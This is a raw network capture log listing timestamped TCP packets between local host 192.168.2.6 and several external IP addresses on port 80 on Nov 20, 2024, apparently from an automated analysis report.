                                                                                  Nov 20, 2024 08:33:31.752319098 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752335072 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752351046 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752383947 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.752383947 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.752413034 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752496004 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752538919 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:32.671402931 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:33.691829920 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:33.696944952 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:33.697050095 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:33.711628914 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:33.716520071 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314476013 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314532995 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314567089 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314598083 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314630985 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314661980 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314683914 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:34.314698935 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314790010 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314805031 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:34.314826012 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314862013 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:34.314863920 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:34.314918041 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:34.318608046 CET5001780192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:34.323486090 CET805001766.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.373475075 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.378602982 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.379334927 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.395322084 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.400341988 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962527037 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962563992 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962591887 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962605000 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.962606907 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962624073 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962639093 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962650061 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.962657928 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962678909 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.962768078 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962812901 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.962836027 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962872028 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.962913990 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:39.967689991 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.967736959 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.967753887 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:39.967778921 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:40.011928082 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:40.049293041 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:40.049344063 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:40.049384117 CET8050018203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:40.049417019 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:40.049437046 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:40.905544996 CET5001880192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:41.924920082 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:41.929980040 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:41.930052996 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:41.948102951 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:41.953058004 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.565973043 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566024065 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566077948 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.566082954 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566119909 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566153049 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566160917 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.566186905 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566220999 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566230059 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.566277027 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566308975 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566318989 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.566399097 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566438913 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.566443920 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.571346998 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.571389914 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.571460962 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.571500063 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.571603060 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.622968912 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.623018026 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.623059034 CET8050019203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:42.623073101 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:42.623125076 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:43.452579021 CET5001980192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:44.472934008 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:44.478015900 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:44.478100061 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:44.501368046 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:44.506663084 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:44.507306099 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.061866999 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.061909914 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.061964989 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062011003 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062014103 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.062043905 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062077999 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062093019 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.062149048 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062184095 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062206030 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.062217951 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062251091 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.062401056 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.062683105 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.067126989 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.067207098 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.067241907 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.067291021 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.067287922 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.067476988 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.148891926 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.148947954 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.148983955 CET8050020203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:45.149082899 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:45.149082899 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:46.038028955 CET5002080192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.049268007 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.054405928 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.054534912 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.063721895 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.068639994 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.637972116 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.637990952 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638000965 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638020992 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638031960 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638123035 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638147116 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.638195038 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638215065 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.638235092 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638246059 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638315916 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.638340950 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.638477087 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.643045902 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643088102 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643099070 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643201113 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.643222094 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.646379948 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.724703074 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724715948 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724726915 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:47.724872112 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.728060961 CET5002180192.168.2.6203.161.46.205
                                                                                  Nov 20, 2024 08:33:47.732964993 CET8050021203.161.46.205192.168.2.6
                                                                                  Nov 20, 2024 08:33:53.835887909 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.840821981 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:53.840919018 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.857135057 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:53.862019062 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.729610920 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.729873896 CET805002243.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:54.735361099 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:55.359285116 CET5002280192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.377084017 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.382258892 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:56.382359028 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.402523994 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:56.407475948 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.270441055 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.270477057 CET805002343.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:57.273456097 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:57.905668974 CET5002380192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.924757004 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.929796934 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:58.930423975 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.945770025 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:33:58.950727940 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:58.950790882 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818623066 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818676949 CET805002543.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:33:59.818741083 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:00.452409029 CET5002580192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.470998049 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.476167917 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:01.476300955 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.485373974 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:01.490386963 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362343073 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362405062 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:02.362520933 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:02.365196943 CET5002680192.168.2.643.155.76.124
                                                                                  Nov 20, 2024 08:34:02.370049953 CET805002643.155.76.124192.168.2.6
                                                                                  Nov 20, 2024 08:34:07.699291945 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.704334974 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:07.704575062 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.718615055 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:07.723602057 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318742990 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318764925 CET8050027103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:08.318850040 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:09.237731934 CET5002780192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.265521049 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.270762920 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.270863056 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.327864885 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:10.333784103 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867294073 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867333889 CET8050028103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:10.867578030 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:11.843204021 CET5002880192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.883373022 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.888386011 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:12.895359039 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.974217892 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:12.981096029 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:12.981232882 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497000933 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497258902 CET8050029103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:13.497498035 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:14.483707905 CET5002980192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.502130985 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.507204056 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:15.507317066 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.515158892 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:15.520925045 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117191076 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117252111 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117292881 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:16.117357016 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.117434025 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.120456934 CET5003080192.168.2.6103.224.182.242
                                                                                  Nov 20, 2024 08:34:16.125334978 CET8050030103.224.182.242192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.152332067 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.157260895 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.157596111 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.170445919 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:21.175338984 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.628746033 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:21.628823996 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:22.690650940 CET5003180192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:22.695611954 CET805003113.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:23.707329988 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.712619066 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:23.712747097 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.727310896 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:23.732351065 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:24.170502901 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:24.170562029 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:25.235325098 CET5003280192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:25.240416050 CET805003213.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.252783060 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.257862091 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.257926941 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.276673079 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:26.281653881 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.281723976 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.724602938 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:26.724767923 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:27.852417946 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.218393087 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.797204971 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.797249079 CET805003313.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.799371004 CET5003380192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.861366034 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.866748095 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:28.867429972 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.879338980 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:28.884496927 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.347915888 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.347978115 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:29.348124981 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:29.353565931 CET5003480192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:29.358505964 CET805003413.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.421104908 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.425992966 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.426058054 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.441217899 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:34.446190119 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.899445057 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:34.903506041 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:35.952739954 CET5003580192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:35.957832098 CET805003513.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:36.971510887 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.976547003 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:36.976869106 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.993566990 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:36.999834061 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:37.436126947 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:37.436227083 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:38.499450922 CET5003680192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:38.505342960 CET805003613.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.519345045 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.524331093 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.529381990 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.543355942 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:39.548275948 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.548496008 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.991364002 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:39.991492033 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:41.050168037 CET5003780192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:41.055380106 CET805003713.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.065563917 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.070652008 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.070733070 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.081414938 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.086386919 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532031059 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532068014 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:42.532171011 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.536000013 CET5003880192.168.2.613.248.169.48
                                                                                  Nov 20, 2024 08:34:42.540899992 CET805003813.248.169.48192.168.2.6
                                                                                  Nov 20, 2024 08:34:47.594947100 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.599852085 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:47.602602959 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.619359970 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:47.624313116 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132668018 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132721901 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132791042 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:48.132853985 CET8050039172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:48.132906914 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:49.124407053 CET5003980192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.174752951 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.181282043 CET8050040172.67.162.39192.168.2.6
                                                                                  Nov 20, 2024 08:34:50.181377888 CET5004080192.168.2.6172.67.162.39
                                                                                  Nov 20, 2024 08:34:50.204757929 CET5004080192.168.2.6172.67.162.39
